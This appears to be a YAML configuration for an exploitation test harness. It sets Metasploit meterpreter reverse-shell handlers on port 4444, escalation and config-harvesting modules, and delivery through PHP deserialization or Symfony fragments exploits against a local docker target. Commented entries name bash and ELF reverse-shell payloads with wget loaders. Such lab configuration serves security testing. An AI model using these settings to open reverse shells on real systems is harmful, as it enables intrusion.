url: https://134.209.85.120:8443/
timeout: 240
host_ip: 10.0.2.2
handlerport: 4444
payload_folder: /tmp/payloads
payload_host: termbin.com
payload_port: 9999
test_defaults:
  exploits:
    - handlers.reverse_tcp
    - recon.metasploit_meterpreter
    - escalation.metasploit_meterpreter_bpf
    - misc.metasploit_meterpreter_getconfigs
  options:
    handlers.reverse_generic_shell:
      run_options: "-z"
    handlers.reverse_tcp:
      run_options: "-z"
    handlers.meterpreter:
      run_options: "-z"
    escalation.metasploit_meterpreter_bpf:
      run_options: "-z"
  deliver: 
    #### USE FOR PHP DESERIALIZATON EXPLOIT
    #method: php_cookie_deserialize
    #url: http://host.docker.internal:8088/unserialize.php
    #### USE FOR SYMFONY FRAGMENTS EXPLOIT
    method: symfony_fragments
    url: http://host.docker.internal:8088

tests: all 
#  - payload:
#      name: meterpreter_shi_iter_base64
#      loader: generic_inline_base64
#  - payload:
#      name: reverse_shell_bash
#      loader: wget_bash
#  - payload:
#      name: reverse_shell_bash
#      loader: wget_generic
#  - payload:
#      name: reverse_shell_elf
#      loader: wget_generic
